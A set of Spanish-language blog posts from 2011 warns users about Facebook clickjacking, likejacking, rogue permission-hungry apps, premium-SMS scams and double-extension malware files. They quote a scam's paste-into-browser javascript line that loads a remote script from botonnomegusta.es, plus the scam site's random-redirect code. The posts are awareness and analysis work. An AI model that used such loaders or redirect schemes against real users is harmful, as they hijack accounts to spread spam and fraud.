Tecnodelitos

lunes, 26 de septiembre de 2011

Clickjacking y Likejacking

Facebook es un hervidero de todo tipo de timos, engaños, etc... Aquí vamos a intentar explicar algunas de esas "joyas de la corona".

El clickjacking o secuestro de clicks

Esta técnica es bastante general y se utiliza en multitud de páginas, ya sea para que pulses en algún enlace, para robar datos, mostrar publicidad,... o cualquier otra acción que voluntariamente no harías. En principio, cualquier cosa que sea posible hacer pinchando o "clickando" un enlace, es susceptible de ser empleado con esta técnica para que realices operaciones que realmente no deseas.

El clickjacking no es un agujero de seguridad en sí mismo, sino que es una forma de utilizar la tecnología para engañar al usuario, haciéndole creer que las cosas, realmente, no son lo que parecen.

El caso típico consiste en cargar una página web dentro de otra, pero dejándola oculta (por ejemplo, indicando opacidad=0 como se comentó en el artículo "GUSANO: Te reto a ver esta página sin reírte!!"). Además, se configura el z-index (atributo que indica el orden en el que muestran los distintos elementos de la página) de modo que la página oculta quede situada encima de la visible.

Veamos algunos ejemplos:

En este ejemplo, se pone una página web propia para robar los datos de la página de fondo que es realmente la que está visible. De este modo, por ejemplo, podríamos haber dado a un desconocido nuestro usuario y la contraseña de acceso a algún servicio.

Para evitar estos casos, es conveniente comprobar la dirección de la página en la que nos encontramos, ya que esta no coincidirá con la dirección real del servicio en la que creemos estar entrando.

El siguiente ejemplo es más difícil de detectar, ya que sería el caso en el que entramos a una web, cuyo único fin es una pequeña distracción, juego, broma, etc... pero que realmente tiene una página web superpuesta en la que nos estamos dando de alta involuntariamente. El principal problema es que no sabremos donde nos hemos dado de alta hasta que nos empiecen a llegar correos electrónicos, hayan robados nuestros datos, etc, etc, etc...

El likejacking o secuestro del "Me gusta" (de Facebook)
Este término toma su nombre del botón "Me gusta" ("Like") que aparece en los comentarios o enlaces compartidos en Facebook, así como en otras páginas que lo emplean (correctamente) para que sus visitantes puedan compartir voluntariamente los artículos, productos... o enlaces en general, que les parezca oportuno o interesantes para su círculo de amigos.

El likejacking consiste en:

Un usuario hace click en un enlace distribuido a través de spam, redes sociales, etc... y va a parar a una web.
Una vez que ha visto el contenido de la web (ya sea falso o real) abandona la misma. Sin embargo, en algún momento se ha publicado en su muro de Facebook un enlace a esa misma web (o a cualquier otra)
El comentario aparece como si lo hubiera publicado el propio usuario, es decir, como si hubiera dado al botón "Me gusta" explícitamente.

El riesgo de este tipo de ataques es que los amigos del usuario verán el enlace y pensarán que es algo interesante, de modo que, pincharán en el enlace y serán víctimas de ese mismo ataque, poniendo en peligro a sus propios amigos.

En cualquier momento (cuando hay bastantes enlaces publicados), los delincuentes pueden cambiar el contenido de la web, de manera que, los usuarios que vayan llegando a la página, no solo verán como se publica un comentario en su nombre en su muro de Facebook sin su consentimiento, sino que además terminarán con su ordenador infectado por cualquier tipo de malware, etc...

Si se identifica que se ha sido víctima de uno de estos ataques, es recomendable eliminar el mensaje publicado en el muro y eliminar el contenido de la lista de cosas que te gustan (si no sabes como puedes echarle un vistazo al artículo "Como eliminar ciertas páginas de nuestro perfil de Facebook"), así como alertar a todos los amigos que puedan haberse visto afectados de que, tal mensaje, era falso.

Veamos algunos ejemplos:

Son muchos los casos en los que te indican que para poder hacer cualquier cosa (como ver quien visita tu perfil), debes pinchar en todos los "Me gusta", compartir un enlace y publicar algo en cierta cantidad de muros o páginas,... y al final,... nada.

Aunque no hayas podido hacer lo que te prometían, lo que si has hecho es publicar en tu perfil ciertos enlaces a páginas fraudulentas, en las que posteriormente "caerán" tus contactos, así como publicar mensajes no deseados en el muro de tus amigos (esto es SPAM, es delito y lo ha hecho el usuario, no la página en cuestión, así que cuidado con lo que publicas).

Hay buscadores que utilizan los "Me gusta" de Facebook para posicionar sus páginas, de modo que, he encontrado, en algunos casos que los promotores de estas páginas son SEO's que venden humo a sus clientes y que lo único que conseguirán es que, la página de su cliente, se catalogue como fraudulenta y tengan gran cantidad de miembros, pero que no tienen ningún tipo de interés por lo que se publica en ella.

Podéis ver este caso en detalle en "Scam-Hoax-Facebook: ¿Quien a visto tu perfil y tus fotos?", donde una empresa de marketing se ha encargado de propagar el timo y el likejacking correspondiente.

Likejacking y clickjacking unidos
En ocasiones se utilizan las dos técnicas anteriormente descritas, como en el caso descrito en el artículo "McDonalds: Otro malware en Facebook" que, como al poco de aparecer cambio el contenido de la página de destino, como se indica en el artículo "iPhone gratis: El malware de McDonalds ha cambiado."

El likejacking puro
Recientemente han aparecido algunas páginas que, a través de JavaScript, se encarga de añadir algunos "Me gusta" a tu perfil sin la necesidad de "Clickar" en ningún contenido de la página (simplemente mostrando la página), así como de publicar información en tu perfil o en el de tus "amigos" según le venga en gana al programador del sitio web.

Compartir la página en Facebook

lunes, 16 de mayo de 2011

SPAM-Hoax-Scam: Botón No Me Gusta y Visitas al Perfil

Hay varios nuevos Hoax (timos) en Facebook, relacionados con el botón "No me gusta" y los contadores de visitas al perfil.

Facebook se niega a informar de las visitas y ha incluir el botón No me gusta

Como ya hemos comentado en otras ocasiones, Facebook ya se ha encargado de que no se pueda saber las personas que visitan un perfil (como se comentó en el artículo "Contadores de visita en Facebook"), ya que esto va contra su política (¿pero Facebook tiene alguna política? Pues parece que sí, pero en ningún caso pretende favorecer a los usuarios, sino vender sus datos al mejor postor y dentro de esta política, no cabe la posibilidad de que los usuarios sepan los usuarios que visitan su perfil).

Con respecto al botón, "No me gusta", Facebook ha indicado que dicho botón tienen muchas connotaciones contraproducentes y no es sencillo de interpretar, de modo que no va a implementarlo bajo ningún concepto. Además, sería contraproducente para Facebook que se pudiera poner el "No me gusta" a cualquier tipo de contenido, Marcas, etc... ya que podrían perder un buen filón, ya que las marcas, solamente reciben "Me gusta". ¿Qué pasaría que permitiera poner el "No me gusta" a una marca, publicidad, etc...? Pues que, directamente, podrían perder muchos ingresos (por publicidad) de las marcas peor valoradas.

¿Por qué tanto interés en que se pulse en el "Me gusta"?

El tema es muy sencillo, al margen de que al pinchar en el "Me gusta" se crea un enlace en tu perfil que hace que tus amigos vuelvan a caer en el timo y de que se infle ficticiamente la cantidad de usuarios de la página. Se consigue que dichas páginas aparezcan mejor posicionados en los buscadores de Facebook y Bing, tal y como se indica en los artículos "El buscador de Facebook se basará en la cantidad de "Me gusta"" y "Bing también usará los "Me gusta" de Facebook", lo hace que algunas empresas de SEO sin escrúpulos lo utilicen para engañar a sus clientes, ya que a pesar de posicionar las páginas en los buscadores, consiguen que la página se clasifique como SPAM, Hoax, etc... incluso antes de nacer.

Aclarado que Facebook no está por la labor.

Una vez aclarado que Facebook no está por la labor de implementar estos mecanismos y mucho menos facilitarlos a desarrolladores independientes los mecanismos necesarios, vamos a ver los nuevos ataques detectados. En esta ocasión, en vez de hacer que concedas permiso a una aplicación para que pueda hacer lo que quiera, te pide que pegues una línea en tu navegador, que hace que seas tu quien haga SPAM a todos tus amigos sin las limitaciones propias de las aplicaciones de Facebook.

Visitas al perfil (http://facebookescaner.com)

Este caso aparece en el perfil de todos tus amigos con el mensaje:

Dios mio! No puedo creer que estuviera 59 horas en el Facebook este mes, y parece que 253 personas han visto mi perfil. Clicka el texto en azul de abajo que pone 'Escanear mi perfil' si quieres saber cuantas horas estubiste y lo popular que eres TU.

Las cantidades, se modifican manualmente por el programador de la web y son datos estáticos, es decir, a todos los que entren en el mismo momento les pone los mismos valores. La página en cuestión tiene la siguiente apariencia

El "texto" que te pide que copies, es una aplicación JavaScript, o lo que es lo mismo un pequeño programa que se va a ejecutar sobre el perfil de Facebook. Dicho JavaScript, realmente lo que hace es cargar otro Script mucho más complejo y que no hace nada de lo indicado.

Para los que no tengan mucha idea al respecto, en el código JavaScript de la imagen lo que se hace es:

En la línea 1 (y antes de hacer cualquier cosa) se indica cual es el mensaje que se va a poner en el perfil de todos tus amigos.
Luego, en las líneas de la 9 a la 18, recoge una lista con todos tus amigos.
En las líneas 19 a 39, se encarga de mandar el mensajito de marras a todos tus amigos.
En la línea 42 te indica que tienes que seguir los pasos para recibir la información.
Por último, te reenvía a otra web en la que te darás de alta en un servicio de pago por recepción de SMS, en el que, con solo introducir tu número de teléfono te habrás suscrito. Las condiciones de este servicio son un precio de 1,42€ por cada SMS y no te envían más de 10 SMS a la semana, o lo que es lo mismo 56€ al mes por cada persona que pique.

Además, promociona dos páginas de Facebook (Advertencia y Sugerencias), que actualmente aparecen en blanco, pero de cuyo futuro contenido no me fío mucho. Abajo tenéis los "Me gusta" en marrón/naranja, por si deseáis eliminarlo de la lista de páginas que os gusta.

De todos modos, ante lo escandaloso del asunto, supongo que Facebook no tardará en eliminarlas, en cuyo caso, os pueden aparecer cosas extrañas.

Advertencias

Sugerencias

No Me Gusta (http://www.botonnomegusta.es)
Este caso aparece en el perfil de todos tus amigos con el mensaje:

Que bien, Facebook ha puesto por fin el boton NO ME GUSTA, si quieres tenerlo tu tambien pulsa en el boton que sale aqui abajo, que dice Instalar NO ME GUSTA.

Este mensaje puede variar, pero sea cual sea su construcción, debéis saber que no es posible poner el botón "No Me Gusta" y que si Facebook en algún momento decide ponerlo será porque le interesa y lo pondrá para todos.

En este caso al pulsar en "Copiar", se copia un JavaScript al portapapeles, que al pegarlo en el navegador y ejecutarlo llama a otro Script, como el de la imagen. Como podréis comprobar son prácticamente idénticos, salvo en las direcciones a la que te envía, el mensaje en cuestión y poco más.

¿Cómo podéis obtener estos Scripts?

Sí queréis ver los Scripts que se van a lanzar realmente, debéis de coger el texto que os han pedido que peguéis en el navegador y pegarlo en un editor de texto plano y obtendréis algo como esto:

javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://botonnomegusta.es/nomegusta.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

Lo que hace este Script es insertar un programa (Script) dentro de la página de Facebook en la que estamos. Dicha página, en este caso, aparece como botonnomegusta.es/nomegusta.js. Si pones en el navegador view-source:http://botonnomegusta.es/nomegusta.js, podrás ver el código que se va a ejecutar al pegar el texto en el navegador. NO LO EJECUTES SI NO SABES LO QUE HACE.

Comparte este artículo
Si eres de los que se han visto invadidos por los mensajes de tus amigos, si te ha servido la información o conoces alguien a quien le haga falta, comparte el artículo para que las personas que hayan propagado los mensajes puedan tomar las medidas oportunas.

Compartir la página en Facebook

lunes, 28 de marzo de 2011

SPAM-Hoax-Scam: ComparteFx, OcioFx, GratisFx, etc... crean tus mensajes virales

Desde hace algún tiempo, están apareciendo en Facebook mensajes compartidos a través de la aplicación ComparteFx, que deberíais bloquear (en el artículo "Como bloquear una aplicación en Facebook" tenéis más información al respecto).

Esta aplicación se utiliza para compartir enlaces, de modo que, desde la página Ociofx.com al pulsar en el texto "Compartir con mis amigos en Facebook", se nos pide permiso para:

Acceder a mi información básica: Puede ver todos tus datos (aunque hayas protegido tu información) y la mayoría de los datos de tus amigos, así como todas las fotos que hayas subido o en las que estés etiquetado.
Enviarme correo electrónico: Puede enviarte cualquier correo que desee. Generalmente se pide para pasar información, en ciertos tipos de aplicaciones, pero en este caso no hay nada que pasar, aunque probablemente estaría pensado para enviar SPAM, lo que pasa es que al acceder a toda tu información ya tienen acceso a la dirección de correo electrónico, de modo que pueden enviarte SPAM sin tener que poner en entre dicho a la propia aplicación.
Publicar en mi muro: Esto le permite a la aplicación publicar mensajes en tu muro, SIN TU APROBACIÓN, pero ¿qué tipos de mensajes va a publicar en mi muro? No informa de ello en ningún momento. Además, también permite que se publiquen mensajes y enlaces en el muro de tus amigos sin informarte.
Acceder a publicaciones de Últimas noticias: Le permite ver todo lo que se publica en nuestro muro o en el de cualquiera de las personas o páginas que seguimos.
Acceder a mis datos en cualquier momento: Damos permiso para que vean nuestro perfil, datos, publicaciones, etc... aunque no estemos conectados, es decir, le permitimos que gestione nuestro perfil cuando no estamos.

Pero, ¿donde está la declaración de intenciones?

Puede que nos interese en algún momento dar todos estos permisos a una aplicación que vaya a realizar alguna operación interesante sobre nuestro perfil (para saber si nos interesa, o no, la funcionalidad de la aplicación deberíamos tener inicialmente una declaración de intenciones que se han "olvidado" de poner).

¿Qué es lo que hace esta aplicación?

Pues, según el enlace a la misma lo único que hace es "Compartir con mis amigos de Facebook", pero eso es una de las funcionalidades básicas de Facebook y no requiere se desarrollo una aplicación a parte para ello. Además, tampoco es necesario pedir ningún tipo de permiso para ello.

Origenes

La primera vez que vi esta aplicación, fue en la página No al cierre de webs, donde nos vendían la cabra para oponerse a la ley SINDE (que particularmente, tampoco me hace ni pizca de gracia). En otras páginas relacionadas informaban que este es el mecanismo definitivo para "generar campañas virales", efectivamente, pero "campañas virales" sobre los asuntos que le vengan en gana a las personas que manejan la aplicación, que podrán publicar indiscriminadamente en el muro de todos los usuarios y sus amigos, así como bloquear otras campañas virales eliminando las publicaciones que no les gustara.

La gran equivocación

En su momento, creé un perfil falso que convertí en amigo de otro perfil falso. Con el paso del tiempo a sucedido esto.

Pero, ¿donde está esta funcionalidad en la página de OcioFx? Pues muy sencillo, la aplicación se encarga de publicar en el muro del otro usuario sin previo aviso.

Prueba SocialBrowser

Como en otras ocasiones, os invito a probar la aplicación SocialBrowser. Ahí podéis publicar en vuestro muro y en el de vuestros amigos, pero ¿qué permisos pide? NINGUNO, no es necesario pedir permisos para ello, ya Facebook se encarga de solicitarlos para cada publicación individual.

Una nueva funcionalidad, aun en desarrollo te permite personalizar totalmente el modo en el que los usuarios comparten las publicaciones en sus muros. Podéis verla en funcionamiento en "Me gusta o NO me gusta" y podéis comprobar que tampoco es necesario dar ningún permiso.

Comparte el artículo

Si eres de los que se han visto invadidos por los mensajes de esta aplicación, comparte el artículo para que las personas que hayan propagado la aplicación puedan tomar las medidas oportunas.

Compartir la página en Facebook

jueves, 3 de marzo de 2011

SPAM-Hoax-Scam: Las 5 cosas que toda chica hace antes que se encuentre con su novio - jajaj

Hace unos días, se publicó esto en mi perfil de Facebook, en vista del mensaje me puse a comprobarlo y le comenté al responsable que era otro de tantos timos que hay en el Facebook. El tema ha ido creciendo, varios amigos me han comentado que han denunciado la aplicación, pero al parecer Facebook está pasando ya un poco del tema del malware, ya que:

Las aplicaciones denunciadas no se están bloqueando convenientemente.
Algunas aplicaciones que anteriormente habían dejado de funcionar vuelven a estar activas.
Algunas páginas, denunciadas infinidad de veces, no se están bloqueando.
Facebook no está bloqueando ciertos "Me gusta" de páginas de SPAM. Si vais al artículo "GUSANO: Te reto a ver esta página sin reírte!! (Ataca de nuevo)" veréis que hay ciertos "Me gusta" que no funcionan porque Facebook los bloqueó en su momento, en cambio el resto sigue teniendo su contador corriendo.

Las 5 cosas que toda chica hace antes que se encuentre con su novio - jajaj (www.las-chicas.es)

Este enlace te envía a una página que lo único que hace es redireccionarte a una aplicación de Facebook, que no tiene por que ser siempre la misma, de modo que si vuelves a entrar es posible que te salga otra. El contenido actual de la página de entrada es el siguiente:

<script type="text/javascript">

   // pana1 - pana10
   var apps_fausto = new Array (
   "http://apps.facebook.com/prapela/");

   // ixp1 - ixp10
   var apps_fausto2 = new Array (
   "http://apps.facebook.com/prabala/");

   // esp1 - esp10
   var apps_fausto3 = new Array (
   "http://apps.facebook.com/tubitor/",
   "http://apps.facebook.com/xinmiel/",
   "http://apps.facebook.com/vanvend/",
   "http://apps.facebook.com/dallile/",
   "http://apps.facebook.com/pernove/",
   "http://apps.facebook.com/xuguele/",
   "http://apps.facebook.com/donners/",
   "http://apps.facebook.com/figanor/",
   "http://apps.facebook.com/viroleg/");

   var apps_animal = new Array
   ("http://apps.facebook.com/ummadruga/",
   "http://apps.facebook.com/doismeiodia/",
   "http://apps.facebook.com/tresmadruga/",
   "http://apps.facebook.com/quatromadruga/",
   "http://apps.facebook.com/cincomadruga/",
   "http://apps.facebook.com/seismadruga/",
   "http://apps.facebook.com/setemadruga/",
   "http://apps.facebook.com/oitomadruga/",
   "http://apps.facebook.com/novemadruga/",
   "http://apps.facebook.com/dezmadruga/",
   "http://apps.facebook.com/onzemeiodia/",
   "http://apps.facebook.com/dozemadruga/",
   "http://apps.facebook.com/trezemadruga/",
   "http://apps.facebook.com/quatorzemadruga/",
   "http://apps.facebook.com/quinzemadruga/");

   var urls = apps_fausto.concat(apps_animal, apps_fausto2, apps_fausto3);

   function redirect()
   {
   window.location = urls[Math.floor(urls.length*Math.random())];
   }
</script>
<body onLoad=redirect();>
</body>

Que, para los no entendidos, son 26 aplicaciones a las que se nos redirecciona aleatoriamente. En estas aplicaciones se nos pide que seleccionemos que regalo queremos y, a continuación, nos piden el número de teléfono, pero si leéis la letra pequeña que aparece en la parte baja de la página te cobran 1,42€ por cada mensaje que te envían, más el coste de navegación wap (dicen que no te enviarán más de 10 mensajes a la semana, que a lo tonto a lo tonto son, más o menos, 56€/mes).

De todos modos si no caes en el timo, las aplicaciones piden los siguientes permisos:

Acceder a mi información básica. Esto lo es automático y lo añade Facebook cada vez que se solicita cualquier permiso, es decir, aunque no se vayan a leer esos datos, Facebook pide ese permiso por defecto.
Publicar en mi muro. Permitimos que la aplicación pueda publicar en nuestro muro siempre que lo desee sin pedir autorización (aunque se de este permiso, Facebook, sólo permite a la aplicación enviar 20 publicaciones diarias). No deberíamos utilizar ninguna aplicación que pidiera este permiso sin saber primero con claridad que es lo que va a publicar en nuestro muro, ya que una aplicación siempre puede publicar en tu muro pidiendo la autorización correspondiente por cada publicación individual.
Acceder a mis datos en cualquier momento. Esto permite que los promotores de la aplicación puedan acceder a tu perfil y a todas las publicaciones de tu muro y del de tus amigos siempre que desee, de modo que pueden volver a publicar en tu muro mientras duermes.

En general, no se debería utilizar ninguna aplicación que no nos indique claramente que es lo que hace antes de pedirnos los permisos correspondientes, como ejemplo, para avanzados y nóveles podéis ver la aplicación SocialBrowser, en ella podéis acceder a algunas utilidades (actualmente todas) sin conceder ningún tipo de permiso a la aplicación, aunque en breve se pondrán en marcha algunas utilidades para la que sí será necesario y se informará puntualmente.

¿Como nos protegemos frente a estas aplicaciones?

En vista de que Facebook se está limpiando las manos al respecto, es necesario realizar algunas actuaciones al respecto, basándonos en todo lo que ya sabemos:

¿Estoy a salvo si no utilizo la aplicación? No. Ya que como vimos en el artículo "Como eliminar los permisos a una aplicación de Facebook" hay muchos datos nuestros a disposición de las aplicaciones a través de nuestros amigos. Si le has dado permiso a algunas de las aplicaciones puedes quitárselos como se indica en dicho artículo.
Es conveniente denunciar la aplicación en el enlace que aparece en la imagen de arriba bajo a la lista de permisos, aunque no siempre funciona y cuando funciona Facebook no le hace mucho caso, así que para mayor eficiencia pasamos de esto.
¿Bloqueamos las aplicaciones? Sí. En todas las pruebas que llevo hechas al respecto, cuando un usuario bloquea una aplicación, dicha aplicación no puede acceder a sus datos, sea quien sea la persona que use la aplicación, de modo que si bloqueamos la aplicación no verán nuestros datos la use quien la use.

Si queréis bloquear las aplicaciones aquí os dejo los enlaces, todas ellas a pesar de ser idénticas internamente (todas se llaman web móvil), todas son distintas aplicaciones:

http://apps.facebook.com/prapela/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/prabala/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/tubitor/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/xinmiel/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/vanvend/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/dallile/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/pernove/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/xuguele/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/donners/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/figanor/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/viroleg/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/ummadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/doismeiodia/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/tresmadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/quatromadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/cincomadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/seismadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/setemadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/oitomadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/novemadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/dezmadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/onzemeiodia/	Página de la Aplicación	No funciona
http://apps.facebook.com/dozemadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/trezemadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/quatorzemadruga/	Página de la Aplicación	Bloquear aplicación
http://apps.facebook.com/quinzemadruga/	Página de la Aplicación	Bloquear aplicación

Comparte el artículo

Si eres de los que se han visto invadidos por los mensajes de estas aplicaciones, de los que quieren que Facebook se ponga un poco más alerta, de los que no quieren que sus datos anden por todo Internet, de los que tienen el típico amigo que prueba todas las aplicaciones, etc... comparte el artículo para que las personas que hayan propagado toda esa información puedan tomar las medidas oportunas para que no vaya a más y las que no lo hayan hecho, protejan su perfil.

Compartir la página en Facebook

Actualización 05/03/2011

OJO: Mientras escribía el artículo cambiaron la lista de aplicaciones, inicialmente eran 37, luego las 26 que se indicaron en el artículo.

Ahora hay otras 37 aplicaciones nuevas, pero todas ellas se llaman web móvil, así que atentos al tema.

Podéis ver las que hayan puesto en este pomento con el siguiente enlace. Código fuente de www.las-chicas.es

En breve, os indicaré como bloquear las aplicaciones a partir de la información obtenida de las direcciones que se extraen del código fuente. Uníos a la página Tecnoenredados para estar al día.

Actualización 07/03/2011

En el artículo "Como bloquear una aplicación en Facebook", tenéis el método a seguir para bloquear las aplicaciones que creáis conveniente.

miércoles, 2 de febrero de 2011

Badoo, Inteligent Elite,... roban datos de los usuarios a Facebook

Desde hace tiempo, el perfil de Facebook de cualquier usuario está plagado de mensajes de una aplicación llamada Badoo, anteriormente fue otra aplicación llamada Intelligent Elite, etc....

En realidad son dos redes sociales, en guerra abierta por hacerse un hueco dentro de las redes sociales, sin ningún miramiento por la protección de datos, privacidad, etc...

Intelligent Elite

La aplicación que puso en marcha esta red social, se basaba en hacer un test de inteligencia, proceso en el cual, ya recogían muchos datos de tu perfil de Facebook (o de Twitter, ya que también hay una aplicación en este ámbito con el mismo fin). Una vez realizado el test, tenías que acceder a la propia red social para ver el resultado de la encuesta.

Al final de todo el proceso tenías una cuenta en una red social "reservada para gente inteligente" (según se define la propia red social). Como es normal, no tienes una contraseña, pero gustosamente te envían un correo para que puedas acceder y poner la que desees y, ya estás dado de alta con todas las de la ley, ya que en este último paso es donde se concede derecho sobre los datos que ya habían robado.

Badoo

El caso de Badoo es muy parecido, salvo que no sé en que momento se ha concedido derecho sobre los datos, ya que entre los casos que conozco, así como en el artículo publicado por el cuerpo de Delitos Telemáticos de la Guardia Civil, los usuarios empezaban a recibir correos de solicitud de contactos por parte de otras personas que formaban parte de la red social, cuando ellos no habían llego a entrar en dichas redes con anterioridad.

Según se indica en elEconomista.es, "El portal de contactos y citas Badoo.com alcanzó los 100 millones de usuarios en el mundo, más de 6 millones de ellos en España" y no me extraña, pero:

¿Cuantos de esos 100 millones de usuarios saben que están registrados en Badoo?
¿Cuantos saben que están utilizando sus datos, fotos, etc... para atraer más contactos?
¿Cuantos de ellos saben que realmente es un sitio de contactos y citas?

No me extrañaría que de aquí a un tiempo empiecen a haber divorcios a raíz de que: "Mi pareja está en Badoo, será que está planteándose dejarme, engañarme, etc...".

Y, por cierto, ¿Qué pasa con todas esas fotos que no queríamos que sólo queríamos que vieran ciertas personas? Como ya se indicó en el artículo "Como eliminar los permisos una aplicación de Facebook", si una persona que esté etiquetada en la foto ha dado permiso a la aplicación, entonces dicha aplicación también puede acceder a dicha foto.

Comparte el artículo
Si eres de los que se han visto invadidos por los mensajes de estas aplicaciones, comparte el artículo para que las personas que hayan propagado toda esa información puedan tomar las medidas oportunas.

Compartir la página en Facebook

miércoles, 19 de enero de 2011

Scam-Hoax-Facebook: ¿Quien a visto tu perfil y tus fotos?

Un nuevo mecanismo

Ya desde hace tiempo, alguna de las páginas Web que hemos mencionado como origen de virus, gusanos, SPAM, etc, etc, etc... han ido cambiando su filosofía.

Cuando se hacía una página para propagar malware, esta terminaba siendo inutilizada por Facebook, bloquean los controles de "Me gusta" asociados a la página, de modo que aparecía el mensaje "Sé el primero de tus amigos al que le gusta esto.", cuando en realidad había cientos de miles de usuarios que ya lo habían marcado y que tenían el enlace en su perfil, algunos de los cuales estaban pensados para que fuera algo más complejo de eliminar de nuestros perfiles (En el artículo "Como eliminar ciertas páginas de nuestro perfil de Facebook" podéis ver como eliminarlos si aún tenéis alguno).

Como esto no llevaba a ningún lado, ya que el cracker al final se quedaba sin poder difundir su malware y tenía que volver a empezar con otra dirección web, en muchos casos se optó por crear varias páginas idénticas o parecidas y poner varios "Me gusta", de modo que cada vez que pinchas en uno de los correspondientes botones "Me gusta", se añadía una página a tu perfil. De este modo, al haber varias direcciones, se conseguía que si alguna de ellas era bloqueada por Facebook, el resto seguirían teniendo enlaces en los perfiles de muchos usuarios, como se puede comprobar aún a día de hoy visitando el artículo "GUSANO: Te reto a ver esta página sin reírte!! (Ataca de nuevo)", en el que uno de los enlaces ya ha sido redireccionado a una página con spam, que genera ingresos al cracker cada vez que se visita y que sigue sin estar bloqueada por Facebook. También se han utilizado los múltiples "Me gusta" para promocionar otras páginas con otros tipos de malwares, etc, etc, etc...

Como se comentó anteriormente en otro artículo, todos estos hoax (Timo o Bulo), scams (Estafas), etc,... se podían utilizar para posicionar ciertas páginas Web para que aparecieran en las primeras posiciones de los buscadores de Microsoft (Bing) y Facebook.

De modo que, además de poder espiar nuestros datos, y los de nuestros amigos, a través de las aplicaciones de Facebook que muchos usuarios utilizan (hay datos que pueden tener un valor elevado en el mercado negro), posicionan la página convenientemente para tener mayor cantidad de visitas. Como tampoco nos podemos fiar de estas otras páginas, ya que pueden cambiar en cualquier momento para difundir cualquier tipo de malware. Marcaremos dichas páginas en Marrón, para identificar páginas que, supuestamente, te gustan, pero que probablemente no has etiquetado voluntariamente.

Descubre Quienes Visitan tu Muro, Fotos y a Quien le Gustas! (www.fanafacebook.com)

Esta es la página que actualmente está difundiendo el scam de los contadores o identificadores de visitas al perfil y a las fotos de los usuarios, que como ya hemos mencionando anteriormente, no es imposible de realizar desde Facebook.

En ella, se muestran los últimos usuarios en utilizar la aplicación, que no es más que un rotativo de imágenes que no cambia nunca o, lo que es lo mismo, totalmente falso.

Tras realizar todas las acciones pertinentes y hacer la publicidad consiguiente a todas las páginas asociadas a los me gusta, lo único que hace el paso final es mostrar el siguiente mensaje, sin ninguna comprobación preliminar (si se hiciera una comprobación preliminar debería consultarse a Facebook desde la página antes de mostrar el mensaje, de modo que podemos afirmar que ¡¡No se realiza ninguna comprobación!!).

Los siguientes números identifican las páginas que se están compartiendo con cada uno de los "Me gusta".

0.- Scam (www.fanafacebook.com)

El enlace etiquetado con el 6, vuelve a compartir esta misma página.

1.- Scam: La propia página que publicita el Scam en Facebook (Descubre Quien ha Visitado tu Perfil y Fotos los Ultimos Dias)

2.- ¿Involuntariamente? (Página de Facebook: EIDCO - Escuela Iberoamericana de Cursos Online)

3.- ¿Involuntariamente? (Página de Facebook: Sin Problemas)

4.- ¿Involuntariamente? (Página de Facebook: LP Construcciones - Real State & Servicios Inmobiliarios)

5.- ¿Involuntariamente? (Página de Facebook: Marketino - Marketing Online Profesional)

Comparte el artículo

Si te ha servido la información o conoces a alguien a quien le haga falta compártela.

Compartir la página en Facebook

miércoles, 12 de enero de 2011

Ocultación de virus: La doble extensión.

Extensiones de archivos o Número Mágico

Desde las primeras versiones del MS-DOS, los archivos tienen un nombre, seguido de un punto y una extensión. Dicha extensión en los sistemas basados en MS-DOS, identifica el tipo de archivo que tiene infinidad de variantes. Los .exe son aplicaciones ejecutables, los .pps son presentaciones de Microsoft PowerPoint, los .xls son archivos de Microsoft Excel, los .jpg, .bmp, .gif, .tif, etc... son diferentes formatos de archivos de imágenes, los .avi, .mpg (o .mpeg), etc... son formatos de vídeos, y un largo etcétera.

En los sistemas basados en Unix/Linux, se utiliza el llamado Número Mágico, que mediante los primeros 2 bytes del contenido del archivo, identifica el tipo de archivo. Aunque en los archivos de los sistemas operativos de Microsoft también existe dicho Número Mágico, no se utiliza ni siquiera para confirmar que la extensión es correcta.

Posteriormente, la evolución de los sistemas operativos de Microsoft, han ocultado las extensiones de los archivos conocidos. Esta opción suele ser la primera que desactivo cuando instalo cualquier sistema operativo de Microsoft, ya que puede traer muchos problemas, como el que se detalla en este artículo.

La opción para desactivar esta característica, se encuentra en las opciones o propiedades de las carpetas del Explorador de Archivos de cualquier versión de Windows y, se denomina "Ocultar las extensiones de archivo para tipos de archivos conocidos", de modo que los archivos que tengan extensiones que no estén asociadas con ninguna aplicación seguirán mostrándose.

Todo esto nos lleva a que en cualquier carpeta podemos encontrar archivos con extensiones y sin extensiones (los que Windows ya conoce), de modo que, a la mayoría no le extraña si encuentra un archivo con extensión .pps, si tiene instalado el Microsoft PowerPoint, pero precisamente, por tener instalada dicha aplicación debería extrañarnos. ¿Si me está mostrando una extensión que es lo que hay detrás? Pues muy sencillo, otra extensión que es la que Windows ha ocultado.

Todo esto, unido a que las aplicaciones pueden personalizarse añadiéndole un icono concreto nos lleva al asunto de ...

Los virus y la doble extensión.

Con la ampliación de los nombres de archivo, se permite poner puntos dentro del nombre, permitiendo por tanto la existencia de archivo que parecen tener varias extensiones, de modo que si creamos una aplicación, le ponemos el icono de alguna de las versiones de Microsoft PowerPoint y hacemos que el nombre termine en ".pps.exe", Windows ocultará el ".exe" y cualquier usuario creerá que está ante un archivo de Microsoft PowerPoint normal y corriente.

